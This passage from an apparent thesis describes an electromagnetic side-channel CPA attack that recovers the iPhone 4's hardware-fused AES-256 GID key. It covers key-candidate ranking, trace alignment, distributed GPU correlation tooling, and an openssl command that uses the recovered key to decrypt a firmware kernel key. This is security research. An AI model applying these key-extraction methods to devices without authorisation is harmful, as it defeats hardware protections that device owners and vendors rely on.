For performing the attack, 256 traces are computed for each key byte in one round, each containing the Pearson correlation coefficient for every sample point. This results in 256 × 16 = 4096 traces for recovering the first 16 bytes. Figure 5.15 shows the correlation over keys. For generating Figure 5.15a, all 256 traces for one byte were scanned in the range [3050, 3150] for their highest correlation value. The point in time with the highest of these 256 values was then used as template to retrieve the correlation values of all 256 traces at that exact point in time. For example, if the maximal value of key candidate 0x08 is 0.000194 at sample 3101 and the maximal value of key candidate 0x25 is 0.000089 at sample 3094, then (assuming the value 0.000194 of candidate 0x08 is the largest among all candidates) every key candidate gets assigned the value at sample 3101 in its correlation trace before the candidates are plotted. Since the correct candidate trace yields a peak which is the highest among all peaks in all traces, it will significantly stand out in the plot. Figure 5.15b, on the other hand, is generated by setting the template point to 3100 in advance, which is the highest peak of the previously computed correlation as shown in Figure 5.13a. Even though the correlation trace of the correct key byte is very noisy and the highest peak in Figure 5.15b does not reflect the correct key, the correct candidate is among the top 5 highest peaks, as seen in the following:

1. Key=0x13 corr=0.000115

2. Key=0x83 corr=0.000109

3. Key=0xb6 corr=0.000109

4. Key=0x05 corr=0.000100 - correct key

5. Key=0xff corr=0.000092

Thus, this key-ranking approach can be used for bruteforcing the AES-256 key using a highly reduced search space for key bytes where a candidate does not significantly stand out.
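The template-point selection and candidate ranking described in this section can be sketched as follows. The sketch assumes that corr[k][s] holds the correlation of key candidate k at sample s; the function name rank_candidates, the tiny synthetic correlation table and its sample indices are assumptions for this example.

```python
def rank_candidates(corr, window):
    """Pick the template sample in window (inclusive) and rank all key candidates there.

    corr[k][s] is the correlation of key candidate k at sample s.
    """
    lo, hi = window
    # Template point: the sample holding the highest correlation of any candidate.
    _, template = max(
        (corr[k][s], s) for k in range(len(corr)) for s in range(lo, hi + 1)
    )
    ranking = sorted(range(len(corr)), key=lambda k: corr[k][template], reverse=True)
    return template, ranking


# Synthetic stand-in with 8 samples per candidate, mirroring the example in the text:
# candidate 0x08 peaks with 0.000194, candidate 0x25 peaks elsewhere with 0.000089.
corr = [[0.0] * 8 for _ in range(256)]
corr[0x08][5] = 0.000194
corr[0x25][2] = 0.000089
corr[0x25][5] = 0.000020

template, ranking = rank_candidates(corr, (0, 7))
print(template, [hex(k) for k in ranking[:5]])
```

Keeping only the first few entries of the ranking for each weak key byte gives the reduced search space mentioned above.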

5.10.2 CPA on Target Key

After having analysed the AES engine's behavior using a known key, this section proceeds with recovering the target key. After performing alignment and filtering, 256 correlation traces are computed for each key byte as previously described in Section 5.10.1.2. Based on the previous analysis, we decided to attack the fifth decryption block. Therefore, correlation is not computed for the first 11'000 samples of the trace. For recovering the first 16 key bytes from 4096 correlation traces, the highest absolute correlation value among all samples in all traces needs to be found. Keeping in mind that some bytes leak more than others, it is expected to find a key candidate for at least one byte with significant leakage. This yields the trace in Figure 5.16, showing the highest absolute correlation value of 0.000232861 among all correlation traces, at sample 3817 for the key candidate 0xb6 at index 10. From previous analysis we know that all bytes leak at the same time, thus we proceed by plotting the correlation over keys for all key bytes, searching for the highest peak in the range [3810, 3820] among the candidates for each byte. Some of these plots are shown in Figure 5.17. It can be seen that some bytes show significant leakage, like byte index 6 (Figure 5.17b) and index 8 (Figure 5.17c). No further processing is needed for those bytes, as their best candidate has a very high likelihood of being correct. Other bytes, like the one at index 11 (Figure 5.17d), have a peak which does stand out, although not as significantly as those at index 6 and 8. These candidates are likely to be correct, yet it should be kept in mind that there might be false positives. Those bytes are candidates for later revision and further analysis in case the recovered key is not correct. Lastly, there are bytes like the one at index 4 (Figure 5.17a), where it is not possible to distinguish the correct candidate from noise with certainty.
There are several ways to address this issue. First of all, we focus just on the positive peaks, since in the previous known-key correlation analysis the most strongly leaking peaks were always positive. Thus, all candidates yielding a correlation below zero can be discarded. Second, due to the oscilloscope's time resolution, measurement errors, alignment and noise, the point in time of maximal leakage is not always at the exact same position, but may vary by a few samples. For those bytes it makes sense to take nearby correlation values into account.

By visually inspecting correlation-over-key plots at each sample in the range [3810, 3820], where the x-axis represents the key candidate and the y-axis shows the Pearson correlation coefficient, the likelihood of certain candidates can be increased or decreased. For example, if at sample 3815 a candidate is the second best, but at sample 3818 the same candidate is not even among the top 10 candidates, chances are that this candidate is a false positive rather than the correct key. On the other hand, if one candidate is always among the top 5 candidates, or at least very often in the upper ranges, it is less likely for that candidate to be just noise. That candidate should be considered for further selection or (if applicable) for brute-force over a reduced search space. An example is shown in Figure 5.18. Manually inspecting individual samples in the range [3814, 3818] yields 0x5e as the best candidate, rather than 0x36 as retrieved previously by searching for the highest peak within the range [3810, 3820] (see Figure 5.17). While these methods are a good last resort, there is another, more obvious approach to deal with key bytes which yield a low correlation. Since 8 blocks are decrypted in CBC mode, it is possible to perform the attack on another block and compare the results with the current block. In the worst case, the previously described approach of eliminating candidates can be extended to reduce the search space even further, as another block brings another source of information. In the best case, however, the correlation for the problematic key bytes at a different block is not as noisy, so that the key byte can be recovered directly from the highest peak. Figure 5.19 shows the correlation over key guesses for byte index 4 at the second block, which yields a much better peak compared to Figure 5.17a. The highest peak in Figure 5.19 is 0x5e, which confirms the candidate recovered with the previously described elimination approach.
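The manual inspection of neighbouring samples can be approximated by counting how often each candidate appears among the best candidates within the window. The following sketch does this on synthetic data; the function name top_n_counts, the noise level and the correlation values are assumptions for this example, and list index 0 merely stands in for the first sample of the inspected window.

```python
import random
from collections import Counter


def top_n_counts(corr, samples, n=5):
    """Count for each key candidate how often it is among the n best at the given samples.

    corr[k][s] is the correlation of key candidate k at sample s.
    """
    counts = Counter()
    for s in samples:
        best = sorted(range(len(corr)), key=lambda k: corr[k][s], reverse=True)[:n]
        counts.update(best)
    return counts


# Synthetic stand-in for a window of 5 samples.
rng = random.Random(5)
corr = [[rng.uniform(-5e-5, 5e-5) for _ in range(5)] for _ in range(256)]
corr[0x5E] = [1.0e-4] * 5    # consistently high, but never the single highest peak
corr[0x36] = [-1.0e-4] * 5   # low everywhere ...
corr[0x36][3] = 1.5e-4       # ... except for one isolated peak

counts = top_n_counts(corr, range(5))
print(counts[0x5E], counts[0x36])
```

In this synthetic case a search for the single highest peak would pick 0x36, while the consistency count favours 0x5e.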
Using this method the first 16 bytes of the master key (AES first round key) are recovered with good confidence. To recover the final 16 bytes of the master key (AES second round key), the first round key is used to derive the state before the second round. Now, by guessing individual bytes of the second round key, we can derive hypothetical power values based on the same power model as for the first round, just one round later. This again yields 4096 correlation traces, which are processed in the same way as the first round correlation traces. Using this method it was possible to successfully recover the full AES-256 target key. The SHA1 hash of the key is 846017165c9f50304fb465fee6978f22dc82da10. The key can be verified by decrypting the ciphertexts in the traces and comparing them to their corresponding plaintexts. Another way to verify the recovered key is to decrypt an iPhone firmware component encryption key. Listing 5.1 shows the decryption of the kernel key for iPhone3,2 iOS 7.1.2 build 11D257.

$ unzip iPhone3,2_7.1.2_11D257_Restore.ipsw kernelcache.release.n90b
Archive: iPhone3,2_7.1.2_11D257_Restore.ipsw
  inflating: kernelcache.release.n90b
$ xxd -p kernelcache.release.n90b | tr -d '\n' | grep -o "4741424b.*" | xxd -r -p | dd bs=1 skip=0x14 count=48 2>/dev/null | openssl aes-256-cbc -iv 00000000000000000000000000000000 -d -nopad -K $(cat A4GIDKey.txt) | xxd -p | tr -d '\n'; echo
054fa7c7537f0d7f5271349656d729e6f24fa28626283eb1e252fec878ab0716d0fd7b6e62cf114fcd1ce132ba96d633
$

Listing 5.1: Using the GID key to get the kernel encryption key for iPhone3,2 iOS 7.1.2 build 11D257

First, the kernel image is extracted from the firmware. Then, the encrypted key is extracted from the kernel image and passed to openssl together with the GID key (which is read from a text file). This yields the IV 054fa7c7537f0d7f5271349656d729e6 and key f24fa28626283eb1e252fec878ab0716d0fd7b6e62cf114fcd1ce132ba96d633, which can also be found on theiphonewiki [Thee]. Finally, to answer the question of how many traces are required to recover the GID key, correlation over traces is plotted using intermediate computation results. Figure 5.20 shows the correlation for each key candidate over the number of traces, with the correct key highlighted in red. The number of required traces varies greatly between key bytes and depends heavily on probe positioning, targeted block and quality of alignment and filtering. In this thesis some key bytes could be recovered with as few as 30'000'000 traces (Figure 5.20b), while others required at least 270'000'000 traces (Figure 5.20a and Figure 5.20d).
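Correlation over the number of traces can be obtained without recomputing everything at each checkpoint by keeping running sums. The following sketch shows this for a single sample point and a single key candidate on synthetic data; the function name correlation_over_traces, the checkpoint interval and the noise level are assumptions for this example.

```python
import math
import random


def correlation_over_traces(hypothesis, leakage, step):
    """Pearson correlation at one sample point, reported every `step` traces."""
    n = s_h = s_t = s_hh = s_tt = s_ht = 0
    checkpoints = []
    for h, t in zip(hypothesis, leakage):
        n += 1
        s_h += h
        s_t += t
        s_hh += h * h
        s_tt += t * t
        s_ht += h * t
        if n % step == 0:
            numerator = n * s_ht - s_h * s_t
            denominator = math.sqrt((n * s_hh - s_h * s_h) * (n * s_tt - s_t * s_t))
            checkpoints.append((n, numerator / denominator))
    return checkpoints


# Synthetic stand-in: 8-bit hamming weight leakage with Gaussian noise.
rng = random.Random(11)
hyp = [bin(rng.randrange(256)).count("1") for _ in range(4000)]
leak = [h + rng.gauss(0, 2) for h in hyp]

progress = correlation_over_traces(hyp, leak, step=1000)
for count, value in progress:
    print(count, round(value, 3))
```

Running this for every key candidate and plotting the checkpoints gives curves of the kind shown in Figure 5.20.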

(a) 1 block (b) 2 blocks

(c) 4 blocks (d) 8 blocks

(e) 16 blocks

Figure 5.1: Traces for different numbers of blocks being decrypted in AES256-CBC mode

Figure 5.2: Multiple AES decryption traces for different numbers of blocks plotted on top of each other

         Length/Blocks             Length
Blocks   GPIO         Peak         GPIO         Peak         Diff
1        1999.76ns    755.58ns     1999.76ns    755.58ns     1244.18ns
2        1062.52ns    437.79ns     2125.04ns    875.58ns     1249.46ns
3        708.39ns     301.89ns     2125.16ns    905.68ns     1219.48ns
4        531.33ns     220.14ns     2125.34ns    880.55ns     1244.78ns
5        458.35ns     190.12ns     2291.74ns    950.58ns     1341.16ns
6        381.97ns     177.64ns     2291.81ns    1065.83ns    1225.98ns
7        345.28ns     162.27ns     2416.96ns    1135.86ns    1281.11ns
8        317.79ns     156.36ns     2542.34ns    1250.91ns    1291.43ns
9        301.01ns     147.31ns     2709.11ns    1325.83ns    1383.28ns
10       270.87ns     144.10ns     2708.74ns    1441.03ns    1267.71ns
11       246.24ns     136.46ns     2708.64ns    1501.03ns    1207.61ns
12       239.62ns     134.67ns     2875.46ns    1616.01ns    1259.46ns
13       230.84ns     131.24ns     3000.89ns    1706.16ns    1294.73ns
14       223.30ns     129.39ns     3126.19ns    1811.41ns    1314.78ns
15       208.39ns     125.42ns     3125.84ns    1881.28ns    1244.56ns
16       205.82ns     124.78ns     3293.17ns    1996.46ns    1296.71ns

Figure 5.3: AES decryption timings 5.10 AES CPA Attack 45

(a) 500 traces after alignment (b) t-value

(c) t-value (zoomed) (d) t-value on top of a trace

Figure 5.4: Non-Specific t-test plots

(a) Full SNR trace (b) SNR zoomed on ciphertext

(c) SNR zoomed on plaintext (d) SNR on top of a trace

Figure 5.5: Signal-to-Noise Ratio using the Hamming weight of the 6th ciphertext/plaintext byte as power model

(a) Block 2 (b) Block 3

(c) Block 4 (d) All rounds of multiple blocks in one plot

(e) All rounds of multiple blocks on top of a trace

Figure 5.9: Correlation traces of leaking power model computed for round 0-14 for multiple blocks

(a) HW64 (b) HW32

(c) HW16 (d) HW8

Figure 5.10: Correlation traces of smaller Hamming weight models computed for round 1-14 of block 2

(a) Block 1 (b) Block 2

(c) Block 3 (d) Block 4

Figure 5.11: 3D heatmap of the SoC plotting highest correlation in time over physical space using the leaking 128-bit power model

Figure 5.12: EM probe positioning on the SoC based on heatmap analysis

(a) index 8 (b) index 1

Figure 5.13: Correlation traces for known key

Figure 5.14: Visualizing highest correlation values for each key byte in the known key correlation trace

(a) index 8 (b) index 5

Figure 5.15: Correlation over keys for key byte index 8 and 5 of known key measurements

Figure 5.16: Correlation over time with the highest peak for byte index 10 of the target key starting from sample 11'000

(a) index 4 (b) index 6

(c) index 8 (d) index 11

Figure 5.17: Correlation over keys for target key bytes of the fifth decryption block

(a) 3814 (b) 3815

(c) 3816 (d) 3817

(e) 3818

Figure 5.18: Correlation over keys for close by samples for target key byte index 4 of the fifth block

Figure 5.19: Correlation over keys for target key byte index 4 of the second decryption block

(a) Index 6 (b) Index 18

(c) Index 24 (d) Index 25

Figure 5.20: Correlation over traces for bytes of the fifth block of target key decryptions

6 Tooling

This section covers the description of algorithms used to process the traces and perform statistical analysis.

6.1 Alignment of Traces

In the following, two methods are presented to properly align recorded traces and to discard outliers. The first uses manual multi-step filtering with alignment based on a minimum value optimization problem. The advantage of this method is precise control over alignment and filtering, which allows discarding as few traces as possible while still achieving the best possible alignment quality. The disadvantage is that manual work is involved, which has to be redone from scratch for each measurement. The second approach is automatic alignment, which is used where the manual method is not feasible. It does not filter and align as accurately, but it also does not require any manual processing.

6.1.1 Manual Alignment

The process for manual alignment is adjusted individually for each measurement. As an example, the alignment of the traces used to retrieve the target key is shown in Figure 6.1 and described in the following. In the raw traces presented in Figure 6.1a, three larger groups of traces can be seen: those with negative Out Of Bounds (OOB) values in the range [7400, 8600] and positive OOB values in the range [7300, 8200]; those with positive OOB values in [9000, 11000] and negative OOB values in [8800, 10600]; and finally those with positive OOB values in [11200, 12900] and negative OOB values in [10900, 12100]. Furthermore, there are some traces with OOB values before sample 6800. First, a coarse-grained alignment and filter is applied to get rid of outliers. This is done by discarding every trace with a value below -75 in the range [1000, 6800]. The red line in Figure 6.1a visualizes that boundary. Next, the first sample with a value above 120 in the range [6000, 11000] (visualized by the green line) is searched for in each trace, and the new synchronised start of the trace is set to 5700 samples before that position. The result can be seen in Figure 6.1b. It should be kept in mind that, due to this alignment, OOB data is plotted for some traces. This can be seen from sample 17000 onwards, where the stored plaintext/ciphertext, the metadata and then the trace stored immediately afterwards in the buffer are plotted. This is ignored for now and taken care of later.
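The coarse filter and threshold alignment of this first step can be sketched as follows. This is a minimal illustration in Python 3, not the tooling used in the thesis: the function name `coarse_align`, its parameter names and the treatment of ranges as half-open intervals are assumptions, and traces without a usable edge are simply dropped. Unlike the original tooling, the sketch truncates each trace instead of reading on into the following buffer contents.

```python
def coarse_align(traces, reject_below=-75, reject_range=(1000, 6800),
                 trigger_above=120, trigger_range=(6000, 11000),
                 pre_samples=5700):
    """Drop outliers, then re-synchronise each trace on its first strong sample.

    Returns (aligned_traces, kept_indices). All names are hypothetical.
    """
    aligned, kept = [], []
    for idx, trace in enumerate(traces):
        lo, hi = reject_range
        # Outlier filter: discard traces dipping below the threshold in the range.
        if any(v < reject_below for v in trace[lo:hi]):
            continue
        lo, hi = trigger_range
        # Search for the first sample above the trigger level.
        pos = next((i for i in range(lo, min(hi, len(trace)))
                    if trace[i] > trigger_above), None)
        if pos is None or pos < pre_samples:
            continue  # assumption: traces without a usable edge are dropped
        # New start of the trace lies pre_samples before the detected edge.
        aligned.append(trace[pos - pre_samples:])
        kept.append(idx)
    return aligned, kept
```

With the default parameters the detected edge of every kept trace ends up at index 5700, which is what allows the later fine-grained step to work with a small shift range.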

The second step is to perform a more fine-grained alignment. To this end, a window of 2'000 samples is placed as indicated by the red lines in Figure 6.1b. Next, one trace is used as a template and every other trace is aligned to it. This is done by subtracting the value of each sample of the trace inside the window from the corresponding sample of the template trace and summing up the absolute differences. Subsequently, the trace is shifted by up to 500 samples to the left and right, and the sum of absolute differences is computed for each shift. Finally, the offset with the smallest sum of absolute differences is used to align the trace. The blue lines indicate the maximum shift, which means that the sample at the left red line can only be shifted to the left until it overlaps with the left blue line, but no further. The same applies to the right red and blue lines. The blue lines must always stay within the trace, which should be kept in mind when applying this method to an area close to the beginning or end of the trace. The result of this fine-grained adjustment can be seen in Figure 6.1c. The third step applies another filter, which discards traces with a value above 125 in the range [11000, 13000] or a value below -85 in the range [10000, 15000]. This is visualized by red lines in Figure 6.1c and the result can be seen in Figure 6.1d. Afterwards, another fine-grained smallest absolute difference alignment is applied to the traces in the range indicated by the red lines in Figure 6.1d. Finally, as seen in Figure 6.1e, a last filter is applied to the result, discarding all traces with a value below -55 in the range [0, 6700], again indicated by a red line. The result after performing all these steps can be seen in Figure 6.1f.
Even though the alignment in this process is handled mostly manually and the concrete parameters need to be adjusted for each measurement individually, this is still a good time-result trade-off, as applying these steps requires little effort and offers precise control over the whole process, as well as the ability to evaluate the results immediately after each step. In this particular example about 30% of the traces were discarded. To speed up this process, the task is split across multiple threads processing several traces each, and Intel AVX [Lom11] Single Instruction Multiple Data (SIMD) instructions are used to compute the offset with the smallest absolute difference to the template trace.
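The smallest absolute difference alignment described above can be illustrated with a short scalar sketch. It is written in plain Python 3 for readability and is not the multithreaded AVX implementation; `best_offset` and `apply_shift` are hypothetical names, and shifts that would move the window outside the trace are skipped, mirroring the requirement that the blue lines stay within the trace.

```python
def best_offset(template, trace, win_start, win_len, max_shift):
    """Return (shift, sad) minimising the sum of absolute differences
    between the template window and the shifted trace window."""
    ref = template[win_start:win_start + win_len]
    best_shift, best_sad = 0, None
    for shift in range(-max_shift, max_shift + 1):
        start = win_start + shift
        if start < 0 or start + win_len > len(trace):
            continue  # the shifted window must stay inside the trace
        sad = sum(abs(a - b) for a, b in zip(ref, trace[start:start + win_len]))
        if best_sad is None or sad < best_sad:
            best_shift, best_sad = shift, sad
    return best_shift, best_sad


def apply_shift(trace, shift, fill=0):
    """Move the trace so that sample i + shift lands on index i."""
    if shift >= 0:
        return trace[shift:] + [fill] * shift
    return [fill] * (-shift) + trace[:shift]
```

For the measurement discussed here the call would use a window length of 2'000 and a maximum shift of 500, so each trace costs 1'001 window comparisons, which is why vectorising the inner sum pays off.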

6.1.2 Automatic Full Chip Scan Alignment

The previously described manual alignment method is not suitable for processing the full chip scan described in Section 5.9, because manually configuring alignment rules for 625 sets of traces is not feasible. Thus, an automatic way is needed to align traces at each position. In the case of the full chip scan, automatic alignment faces several challenges. One of them is that the scan program automatically adjusts the voltage range settings so that the highest signal peaks use the full spectrum, which means peaks can potentially look different in every trace set. Another challenge is that it is not possible to know in advance at what points in time peaks will appear and how many there will be. Not many assumptions can be made when aligning the traces at each position on the chip, since the number of peaks, their height and their position are unknown. Nonetheless, we can assume that there has to be at least one time frame in which the measured peaks are significantly above other, lower peaks on the trace. This is because if all peaks had the same height, the trace would be considered just noise without any useful signal. Thus, the idea is to find a range where the peaks are the furthest apart from the mean value, as this is the range where the previously described smallest absolute difference alignment works best. The first step is to compute a mean trace over all traces. This is done to filter out noisy parts of the trace without knowing in advance where the noise is. A mean trace with all processing steps, which are described in the following, can be seen in Figure 6.2. The second step is to find all peaks. These are indicated by colored dots in Figure 6.2. Next, a mean is computed over all peaks. The result is visualized by the horizontal orange line. Afterwards, the peaks are separated into two groups: the ones above the mean and the ones below. Then, a mean is computed again for each group separately. The green line illustrates the mean of the peaks above the orange line, while the red line illustrates the mean of the peaks below the orange line. Subsequently, all peaks which lie between the green and red lines are discarded and only the peaks outside that range are processed further. This is done to discard the ground noise and to process just the signal candidate peaks. Finally, a window of 3'000 samples is moved over the trace and for each position a score is computed by summing up the distance of the (orange) mean to each peak outside the range of the red and green lines. The position with the highest score is then used for aligning all traces using the smallest absolute difference method with an arbitrary template trace. This process is repeated for each position on the chip.
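The window selection can be sketched in a few lines of Python 3. The sketch rests on several assumptions that the text does not fix: a peak is taken to be any strict local maximum or minimum of the mean trace, peaks lying exactly on the green or red line are kept, and the first window with the highest score wins. The names `mean_trace`, `find_peaks` and `select_window` are hypothetical.

```python
def mean_trace(traces):
    """Point-wise mean over all traces (assumed to have equal length)."""
    n = len(traces)
    return [sum(col) / n for col in zip(*traces)]


def find_peaks(trace):
    """Indices of strict local maxima and minima (assumed peak definition)."""
    return [i for i in range(1, len(trace) - 1)
            if (trace[i] > trace[i - 1] and trace[i] > trace[i + 1])
            or (trace[i] < trace[i - 1] and trace[i] < trace[i + 1])]


def select_window(traces, win_len=3000):
    """Return the start index of the window with the highest peak score."""
    avg = mean_trace(traces)
    peaks = find_peaks(avg)
    if not peaks:
        return 0
    centre = sum(avg[i] for i in peaks) / len(peaks)           # orange line
    upper = [avg[i] for i in peaks if avg[i] > centre]
    lower = [avg[i] for i in peaks if avg[i] <= centre]
    hi = sum(upper) / len(upper) if upper else centre          # green line
    lo = sum(lower) / len(lower) if lower else centre          # red line
    # Keep only signal candidates outside the band between red and green.
    strong = [i for i in peaks if avg[i] >= hi or avg[i] <= lo]
    best_start, best_score = 0, -1.0
    for start in range(max(1, len(avg) - win_len + 1)):
        score = sum(abs(avg[i] - centre) for i in strong
                    if start <= i < start + win_len)
        if score > best_score:
            best_start, best_score = start, score
    return best_start
```

The scoring loop is deliberately naive and recomputes the sum for every window position; a running sum over the sorted peak indices would give the same result faster.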

6.2 Efficient Correlation Implementation

This section deals with efficiently computing multiple correlations using a pipelined multiprocessing approach in order to recover the AES key. For this purpose a scalable program was written to distribute the computation among multiple threads on multiple GPUs on multiple hosts. This setup uses an over-the-network client-server approach with one central server and multiple trusted clients. Some parts are hardcoded for the current use case; however, certain parts, such as the power model, can be exchanged with little effort.

6.2.1 Server

This section describes the server in detail. It is started with the following parameters: the first two parameters are the input directory containing aligned traces and the output directory to which the correlation traces are saved. Further parameters are the power models (represented as strings) which will be computed by the clients. For recovering the target key, 30'000 files were used, containing (on average) 14'000 traces each.

On initialization the server scans the input directory, creates a list of all files residing in that directory and adds them to a work queue. One of the trace files is loaded in order to read the number of points per trace, which is assumed to be consistent among all trace files. Afterwards, a Transmission Control Protocol (TCP) socket is opened and the server listens for incoming connections on port 8452. When a client connects, the number of points per trace and a list of power models (see Section 2.2.3) represented as strings are sent to the client for initialization. Afterwards, the client is ready to receive a batch to work through. While the client is connected, the following procedure is executed in a loop: as long as the work queue is not empty, a batch of filenames is taken from the queue and sent to the client. Since only filenames are transferred, the clients are responsible for loading the correct trace files using this information. One possibility for distributing traces to the clients is to use the BitTorrent [Coh03] protocol and to mount a .torrent file using the FUSE [liba] based BTFS [joh] filesystem. This allows multiple servers to seed the traces, which is a scalable way to distribute large amounts of data, considering that disk reading speed might become a bottleneck beyond a certain amount of data and number of clients. Another way is to mount a Windows shared folder on all clients, which was done in this thesis due to the lack of multiple seeding servers. A third option is to make the clients download traces over Hypertext Transfer Protocol (HTTP), which was implemented but not used during this thesis. The clients are expected to compute intermediate values such as the mean and central sum for their traces as well as for the hypothetical traces of each power model and send them back to the server.
When those are received, the server uses the results to update the global mean and central sum traces using the incremental batch formulas described in Section 2.2.7. Then another set of filenames is sent to the client and the procedure is repeated until no more filenames are in the queue. In case a client disconnects, its work-in-progress batch is re-appended to the global queue and redistributed among the other clients. Because the clients are assumed to be trusted, only basic error checking and no proper validation is performed on the received computation results. When all traces are processed and the results are received, the server proceeds to compute the correlation using the intermediate values. Optionally, it is possible to compute an intermediate correlation each time a client sends results or after a certain number of traces has been processed. This is useful for generating plots like the ones seen in Figure 5.20.
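How partial results from different clients can be folded into one global result is sketched below in Python 3 for a single point in time and a single key guess. Section 2.2.7 is not reproduced here, so the sketch assumes the standard pairwise update formulas for the mean, the sum of squared deviations (taken to be the "central sum") and the co-moment that forms the numerator of the Pearson correlation. The dictionary layout and the names `batch_stats`, `merge` and `correlation` are hypothetical.

```python
import math


def batch_stats(xs, hs):
    """Intermediate values of one batch: xs are measured samples at one
    point in time, hs the hypothetical values for one key guess."""
    n = len(xs)
    mean_x = sum(xs) / n
    mean_h = sum(hs) / n
    return {
        "n": n,
        "mean_x": mean_x,
        "mean_h": mean_h,
        "cs_x": sum((x - mean_x) ** 2 for x in xs),   # central sum, measured
        "cs_h": sum((h - mean_h) ** 2 for h in hs),   # central sum, hypothetical
        "upper": sum((x - mean_x) * (h - mean_h) for x, h in zip(xs, hs)),
    }


def merge(a, b):
    """Combine two batches without touching the raw traces again."""
    n = a["n"] + b["n"]
    dx = b["mean_x"] - a["mean_x"]
    dh = b["mean_h"] - a["mean_h"]
    w = a["n"] * b["n"] / n
    return {
        "n": n,
        "mean_x": a["mean_x"] + dx * b["n"] / n,
        "mean_h": a["mean_h"] + dh * b["n"] / n,
        "cs_x": a["cs_x"] + b["cs_x"] + dx * dx * w,
        "cs_h": a["cs_h"] + b["cs_h"] + dh * dh * w,
        "upper": a["upper"] + b["upper"] + dx * dh * w,
    }


def correlation(s):
    """Pearson correlation from the accumulated intermediate values."""
    denom = math.sqrt(s["cs_x"] * s["cs_h"])
    return s["upper"] / denom if denom else 0.0
```

Because `merge` only needs the six values per batch, the server can compute an intermediate correlation after every received result, which is the property exploited for the correlation-over-traces plots.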

6.2.2 Clients

Due to the way this project is designed, there are no restrictions on how a client processes the traces. The only requirements are that the client implements the network protocol correctly and returns the expected intermediate results. Thus, several implementations are feasible, such as multithreaded CPU implementations on different architectures, possibly with support for SIMD instructions like Intel AVX or SSE. It is also possible to implement a client in JavaScript to use the computing power of closed systems by visiting a website in a browser. Another option is to implement the client with GPU acceleration using CUDA [NVI10] or OpenCL [Khr11]. The latter is described in the following section.

6.2.3 OpenCL GPU Client

This section describes a client which performs the computations on one or multiple GPUs using OpenCL. The client is started with the following four parameters: the input directory containing aligned traces, the server address and port separated by a colon, the available amount of RAM in bytes, and a comma separated list of GPU indices to be used. The client starts by reading a kernels.cl file, which contains the source code to be executed on the GPU with all possible power models. Then, it connects to the server and receives the power model names as well as the number of points each trace has. For every power model which needs to be processed, each GPU gets a separate worker instance with its own queue. A so-called GPUpowermodel instance receives the kernels.cl source file and the number of points per trace, and is assigned a power model name. The kernels.cl source code copy is modified on the fly so that the corresponding power model is selected. Afterwards, it is compiled and the program is transferred to the GPU. In addition, every GPUpowermodel allocates memory for holding a mean and central sum trace with the number of points as previously received, together with memory for 256 hypothetical mean traces and hypothetical central sum traces with one point per trace each. Furthermore, memory for 256 so-called upper part traces is allocated, which store numerator precomputation values of the Pearson correlation coefficient (see Section 2.2.5.2), based on real and hypothetical traces. These allocations are doubled, as there are two sets containing each of these, one local and one global. The local set holds the results of an individual trace file after it has been processed, while the global set holds the combined results of all trace files processed on one GPU. When the initialization is finished, the client proceeds to receive a batch of filenames from the server.
A queue is created from that list and multiple threads start loading the files into RAM from the location specified in the first parameter. The files can be loaded from a local disk, a shared drive mounted over the network, a BTFS FUSE based filesystem receiving the files over BitTorrent, or an HTTP server. When a file is loaded and possibly decompressed, it is appended to a queue from which other worker threads can fetch it for further processing. Since loading can take some time depending on the source, a certain number of files is buffered in RAM. The exact number is computed dynamically, taking into account the available RAM size as specified in the third parameter. While the files are being loaded, a worker for each GPU is waiting to dequeue them for further processing. When multiple GPUs are used, a trace file is only processed on one of them.

Since the number of traces in each file varies after alignment and filtering and can be much smaller than before filtering, it is possible to combine multiple files in RAM before transferring them to the GPU if the number of traces is below a certain threshold. In this particular case multiple files are combined when a file has fewer than 20'000 traces, unless the combination would result in more than 25'000 traces. After all files from the current batch have been loaded and transferred to the GPUs, the client waits for all GPUs to finish processing. Then, the global results of each GPU are transferred to RAM and the incremental batch formulas (Section 2.2.7) are used to combine all sets into one set consisting of one mean and central sum trace, 256 hypothetical mean and central sum values as well as 256 upper part traces for each power model. Finally, the results are sent to the server, the GPU memory is cleared and the process starts over if more work is available. Whenever a worker receives a trace, it is transferred to the GPU if there is enough free Video Random Access Memory (VRAM) left. Otherwise the transfer is stalled until enough VRAM is available. The memory object in VRAM is assigned a reference counter, which is incremented once for each available GPUpowermodel. Afterwards, that object is passed to every GPUpowermodel's work queue. Each GPUpowermodel processes a trace by computing a local mean and central sum trace, 256 hypothetical mean and central sum values as well as 256 upper part traces. Then, the incremental batch formulas are used to update the GPU's global traces. Afterwards, the trace reference counter is decremented and the memory is freed once it reaches zero.
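The file-combining rule at the start of this paragraph can be read as a simple greedy grouping, sketched here in Python 3. The text only states the two thresholds; the order in which files are considered, the decision to hand a group over as soon as it reaches 20'000 traces, and the name `group_files` are assumptions made for illustration.

```python
def group_files(files, small=20000, limit=25000):
    """Group (name, trace_count) pairs for transfer to the GPU.

    Files with at least `small` traces are transferred on their own.
    Smaller files are merged greedily as long as the merged group does
    not exceed `limit` traces.
    """
    groups = []
    pending, pending_count = [], 0
    for name, count in files:
        if count >= small:
            groups.append([name])          # large enough on its own
            continue
        if pending and pending_count + count > limit:
            groups.append(pending)         # merging would exceed the limit
            pending, pending_count = [], 0
        pending.append(name)
        pending_count += count
        if pending_count >= small:
            groups.append(pending)         # assumption: group is now big enough
            pending, pending_count = [], 0
    if pending:
        groups.append(pending)
    return groups
```

Fewer, larger transfers keep the GPU kernels busy for longer per launch, which is presumably the motivation for combining small files at all.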

(a) Raw (b) After step 1

(c) After step 2 (d) After step 3

(e) After step 4 (f) Final

Figure 6.1: 500 traces plotted after each alignment step

Figure 6.2: Mean trace processing during automatic alignment

7 Conclusion

This chapter summarizes the results of this thesis and gives ideas for future work.

7.1 Summary

In this thesis, the EM side-channel was used to analyse the AES engine of the Apple iPhone 4. Using an accurate power model, the full hardware fused 256-bit GID key was recovered through EM leakage with a highly optimized CPA attack. The results of the analysis are summarized in the following. The AES engine is implemented in hardware and features 128-bit, 192-bit and 256-bit encryption and decryption modes. These can be used with the UID key, the GID key or a user supplied key to encrypt/decrypt one or multiple blocks in CBC mode. From the CPU's perspective it takes about 2000ns to decrypt a single block, including I/O transfers to and from the AES engine (first row, fourth column in Figure 5.3). On the engine, however, a single round takes 5ns (Section 5.7), so the 14 rounds of an AES-256 decryption take 70ns. Including latency, one block needs 95ns to be fully processed within the engine. Several facts suggest that the implementation is round based, where a 128-bit register is updated in every round. The register holds the state after the S-Box and permutation layer, P(S(S_r)), in each round. It is assumed that a round is processed in a single clock cycle (Section 5.7). Based on that, the clock speed of the AES engine is assumed to be 200MHz.
